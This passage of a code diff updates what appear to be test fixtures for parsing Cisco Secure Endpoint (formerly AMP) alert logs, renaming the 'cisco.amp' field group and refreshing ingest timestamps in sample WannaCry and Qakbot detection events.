0b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3761,7 +3761,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3839,7 +3839,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510414604Z",
+                "ingested": "2021-09-27T00:41:33.421002215Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3850,7 +3850,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -3924,7 +3924,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510416464Z",
+                "ingested": "2021-09-27T00:41:33.421003961Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3935,7 +3935,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4022,7 +4022,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510418340Z",
+                "ingested": "2021-09-27T00:41:33.421005717Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4033,7 +4033,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.24D004A104-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4124,7 +4124,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510420342Z",
+                "ingested": "2021-09-27T00:41:33.421007602Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4135,7 +4135,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.24D004A104-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4194,13 +4194,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:07:04.510422223Z",
+                "ingested": "2021-09-27T00:41:33.421009360Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6412662859016176000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4249,13 +4249,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:07:04.510424077Z",
+                "ingested": "2021-09-27T00:41:33.421011122Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6412662854721208000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4311,7 +4311,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510425946Z",
+                "ingested": "2021-09-27T00:41:33.421012882Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -4321,7 +4321,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4386,7 +4386,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510427827Z",
+                "ingested": "2021-09-27T00:41:33.421017406Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -4396,7 +4396,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4461,7 +4461,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510429716Z",
+                "ingested": "2021-09-27T00:41:33.421019409Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -4471,7 +4471,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4542,7 +4542,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510431561Z",
+                "ingested": "2021-09-27T00:41:33.421021176Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -4553,7 +4553,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4621,7 +4621,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510433405Z",
+                "ingested": "2021-09-27T00:41:33.421022930Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -4632,7 +4632,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4700,7 +4700,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510435245Z",
+                "ingested": "2021-09-27T00:41:33.421024669Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -4711,7 +4711,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4773,7 +4773,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510437110Z",
+                "ingested": "2021-09-27T00:41:33.421026417Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4783,7 +4783,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4869,7 +4869,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510438994Z",
+                "ingested": "2021-09-27T00:41:33.421028180Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4880,7 +4880,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.24D004A104-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -4971,7 +4971,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510440850Z",
+                "ingested": "2021-09-27T00:41:33.421029920Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat 